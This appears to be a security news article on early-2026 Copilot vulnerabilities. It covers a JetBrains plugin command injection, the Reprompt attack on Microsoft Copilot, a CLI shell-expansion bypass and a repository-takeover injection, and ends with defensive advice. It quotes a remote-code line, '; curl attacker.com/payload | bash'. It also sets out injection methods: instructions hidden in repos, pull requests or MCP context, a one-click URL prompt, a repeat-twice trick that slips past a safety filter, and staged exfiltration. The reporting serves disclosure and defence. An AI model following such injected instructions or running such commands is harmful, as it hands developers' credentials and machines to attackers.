A CVSS 8.8 command injection in GitHub Copilot for JetBrains. A one-click data exfiltration chain in Microsoft Copilot. A TOCTOU race condition in Copilot for VS Code. Three shell expansion bypasses in Copilot CLI. All disclosed within weeks of each other in early 2026. The common thread: AI coding assistants that treat untrusted input as trusted instructions, then act on it with the developer’s full permissions.
CVE-2026-21516 is the headline vulnerability, but it belongs to a pattern. The Reprompt attack, discovered by Varonis Threat Labs, showed the same fundamental flaw on the Microsoft 365 side. And a research paper from January 2026 (arXiv:2601.17548) found that 100% of tested agentic coding assistants are vulnerable to prompt injection, with adaptive attack success rates exceeding 85%.
CVE-2026-21516: Remote Code Execution Through Your IDE
GitHub Copilot for JetBrains versions 1.0.0 through 1.5.62 had a command injection vulnerability classified as CWE-77 (Improper Neutralization of Special Elements in Commands). Microsoft assigned it CVSS 8.8. The attack vector: network, no privileges required, user interaction required. Full impact on confidentiality, integrity, and availability.
The bug sat in how the plugin handled model output. When Copilot generated code suggestions, it sometimes fed those suggestions into command-construction logic for IDE operations. The problem: it never sanitized shell metacharacters. Semicolons, pipes, backticks, dollar signs with parentheses, all passed through untouched. If Copilot’s suggestion contained ; curl attacker.com/payload | bash, the plugin would execute it.
Three Attack Scenarios
Supply-chain trojan. An attacker plants crafted instructions in a public repository, hidden in code comments, README files, or documentation strings. A developer opens the repo in JetBrains with Copilot enabled. Copilot ingests the content as context, generates a suggestion containing shell metacharacters, and the plugin executes the constructed command under the developer’s user account. No interaction beyond opening the project.
Malicious pull request. An external contributor submits a PR with embedded instructions buried in comments or markdown. The developer asks Copilot to summarize or refactor the PR content. The assistant processes the malicious text, generates a suggestion that triggers execution. This is particularly dangerous in open-source projects where external PRs are routine.
Poisoned MCP context. If the developer’s setup includes a Model Context Protocol integration, an attacker-controlled MCP endpoint can deliver model suggestions with executable payloads directly into the IDE context. The plugin trusts the model output; the model trusts the context; the context is controlled by the attacker.
Why Developer Workstations Are High-Value Targets
A compromised developer machine is not just one laptop. It typically holds SSH keys, long-lived API tokens, CI/CD credentials, cloud provider access keys, and commit signing certificates. A single code execution event on a developer workstation can escalate into a supply-chain compromise affecting every downstream consumer of the software.
Microsoft patched CVE-2026-21516 on February 10, 2026, in version 1.5.63. No known exploitation in the wild before the fix.
The Reprompt Attack: One Click to Full Data Exfiltration
Dolev Taler at Varonis Threat Labs discovered a separate class of attack targeting Microsoft Copilot (the personal assistant integrated into Windows and Edge, not the enterprise Microsoft 365 Copilot). He reported it to Microsoft on August 31, 2025. Microsoft patched it server-side on January 13-14, 2026. No CVE was assigned because it was a service-side fix.
The attack chain has three stages, each bypassing a different layer of defense.
Stage 1: Parameter-to-Prompt Injection
Microsoft Copilot’s URL accepts a q parameter that auto-populates the prompt field: copilot.microsoft.com/?q=[instructions]. When the victim clicks this legitimate-looking Microsoft link, the prompt loads and executes automatically. No typing, no plugins, no connectors. Taler described it: “Only a single click on a legitimate Microsoft link is required to compromise victims.”
Stage 2: Double-Request Guardrail Bypass
Copilot scans outgoing requests for data-leaking patterns, but only on the first pass. Taler found that instructing Copilot to “always double check yourself” and repeat actions twice caused the safety filter to fire on the first attempt and miss the second. The second request “worked flawlessly,” exfiltrating data the guardrail was supposed to block.
Stage 3: Chain-Request Exfiltration
The initial prompt instructs Copilot to fetch follow-up instructions from an attacker-controlled server. That server responds with staged commands (stage1, stage2, stage3), each requesting different categories of sensitive information: usernames, calendar events, recent files, conversation history, location data. Because the real instructions come from the server, inspecting the initial URL reveals nothing about what data will be stolen.
David Shipley of Beauceron Security called LLMs “high speed idiots” that “can’t distinguish between content and instructions, and will blindly do what they’re told.” That bluntness captures the core problem: no amount of post-hoc filtering can reliably separate legitimate instructions from injected ones when the model processes both identically.
The Broader Pattern: Copilot’s Rough Start to 2026
CVE-2026-21516 and Reprompt are the most severe, but they were not alone. Early 2026 saw a cluster of Copilot-adjacent vulnerabilities that all stem from the same architectural trust assumptions.
CVE-2026-21523 (CVSS 8.0): A time-of-check time-of-use race condition in GitHub Copilot and VS Code, also disclosed February 10, 2026. The flaw lets an authorized attacker execute code over the network by exploiting the gap between when Copilot validates a suggestion and when the IDE applies it.
CVE-2026-29783 (CVSS 7.5): A shell expansion vulnerability in Copilot CLI versions up to 0.0.422. Bash parameter expansion patterns like ${var@P} bypassed the CLI’s “read-only” safety assessment, allowing arbitrary code execution through what the tool classified as a safe, informational query. Fixed in 0.0.423.
RoguePilot (Orca Security): Researcher Roi Nisimi at Orca Security demonstrated a passive prompt injection via GitHub Issues containing hidden HTML comments. The injection chain led to GITHUB_TOKEN theft and full repository takeover via Codespaces. Microsoft patched it by late February 2026.
Each of these represents a different entry point, but the root cause is identical: the AI system trusts content it should treat as adversarial.
What This Means for Your Security Posture
If your team uses AI coding assistants (and 78% of developers now do), these vulnerabilities warrant specific action, not just patching.
Update immediately. Copilot for JetBrains must be on version 1.5.63 or later. Copilot CLI must be on 0.0.423 or later. Check your VS Code Copilot extension version as well. Reprompt was fixed server-side by Microsoft, so no client action is needed for that specific bug.
Treat all model output as untrusted. This is the lesson every Copilot CVE teaches. Code suggestions, terminal commands, file modifications, anything the assistant generates should pass through the same validation you would apply to user-supplied input. Sandboxing IDE plugin execution, restricting shell access from suggestion pipelines, and requiring explicit user confirmation for any command execution are all reasonable measures.
Audit your MCP connections. If your IDE connects to external MCP servers, each one is a potential injection vector. The OWASP MCP Top 10 published in March 2026 provides a systematic framework for evaluating these risks.
Review PR workflows. Malicious pull requests are a documented attack vector for Copilot exploitation. Automated scanning for suspicious patterns in PR content (hidden Unicode, encoded instructions, unusual comment structures) adds a layer of defense that does not depend on the AI system’s judgment.
Monitor for anomalous IDE behavior. Unexpected network connections, file system writes outside the project directory, or shell command execution from the IDE process are indicators that an injection may have succeeded. EDR solutions that monitor developer tooling specifically are becoming a distinct product category for this reason.
Frequently Asked Questions
What is CVE-2026-21516 in GitHub Copilot?
CVE-2026-21516 is a command injection vulnerability (CVSS 8.8) in GitHub Copilot for JetBrains versions 1.0.0 through 1.5.62. It allowed attackers to achieve remote code execution by embedding malicious instructions in repository content that Copilot processed as context, generating suggestions containing shell metacharacters that the plugin executed without sanitization.
What is the Reprompt attack on Microsoft Copilot?
Reprompt is a three-stage attack discovered by Varonis Threat Labs that exploited Microsoft Copilot Personal. It used a URL parameter to auto-execute prompts, bypassed safety guardrails through a double-request technique, and exfiltrated sensitive user data through chain-requests to an attacker-controlled server. It was patched by Microsoft on January 13-14, 2026.
How can I protect against prompt injection in AI coding assistants?
Keep all AI coding tools updated to their latest versions. Treat all model output as untrusted input. Sandbox IDE plugin execution and require explicit confirmation for command execution. Audit MCP server connections. Scan pull requests for suspicious patterns. Monitor developer workstations for anomalous network or file system activity from IDE processes.
Is GitHub Copilot safe to use after CVE-2026-21516?
The specific vulnerability was patched in version 1.5.63, released February 10, 2026. However, the broader class of prompt injection attacks against AI coding assistants remains an active area of research. A January 2026 study found that 100% of tested AI coding assistants are vulnerable to prompt injection with adaptive success rates above 85%. Using Copilot with updated versions and appropriate security controls is reasonable, but it should not be treated as inherently trusted.
Were CVE-2026-21516 or Reprompt exploited in the wild?
Neither vulnerability has confirmed exploitation in the wild before being patched. CVE-2026-21516 was fixed the same day it was publicly disclosed (February 10, 2026). Reprompt was reported to Microsoft in August 2025 and patched in January 2026 before public disclosure. However, the attack techniques are now well-documented, making post-patch exploitation attempts likely against unpatched systems.
